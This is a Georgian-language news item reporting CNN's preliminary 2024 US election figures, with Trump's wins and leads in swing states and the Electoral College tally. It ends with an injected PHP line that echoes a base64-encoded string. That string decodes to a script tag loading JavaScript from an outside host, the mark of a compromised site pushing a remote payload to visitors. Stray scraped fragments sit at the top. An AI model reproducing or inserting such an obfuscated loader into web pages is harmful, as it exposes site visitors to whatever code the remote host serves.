celsiusi
ავერსი საქკაბელი

„სიენენის“ წინასწარი მონაცემებით, აშშ-ის პრეზიდენტობის რესპუბლიკელმა კანდიდატმა, დონალდ ტრამპმა ორ მერყევ შტატში გაიმარჯვა, ხოლო სამში ლიდერობს. მედიის ინფორმაციით, ტრამპი გამარჯვებულია ჩრდილოეთ კაროლინასა და ჯორჯიაში. პენსილვანიაში, სადაც დათვლილია ხმების 93%, დონალდ ტრამპს 51,1% აქვს, ხოლო ჰარისს – 47,8%.

არსებული ცნობით, მიჩიგანში დათვლილია ხმების 61%, ტრამპს აქვს 52%, ხოლო ჰარისს – 46%. რაც შეეხება ვისკონსინს, დათვლილია ხმების 86%. ტრამპს აქვს 51,2%, ჰარისს – 47,2%.

„სიენენის“ ინფორმაციით, საარჩევნო კოლეგიაში ახლა ტრამპს აქვს 246 ხმა, ხოლო ჰარისს – 187.

გამარჯვებისთვის საჭიროა 270 ხმა. ამ რაოდენობის ხმების მოსაგროვებლად ტრამპს 3 მერყევი შტატიდან, სადაც ის ამჟამად ლიდერობს, 2-ში სჭირდება გამარჯვება.

ცნობისთვის, აშშ-ის საარჩევნო სისტემაში გადამწყვეტ როლს საარჩევნო კოლეგია თამაშობს, რომელშიც თითოეული შტატის წარმომადგენლობა დამოკიდებულია მოსახლეობის რაოდენობაზე. საარჩევნო კოლეგიაში სულ 538 დელეგატია, ხოლო არჩევნებში გამარჯვებისთვის პრეზიდენტობის კანდიდატმა 270 ხმა უნდა მოიპოვოს.

46
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");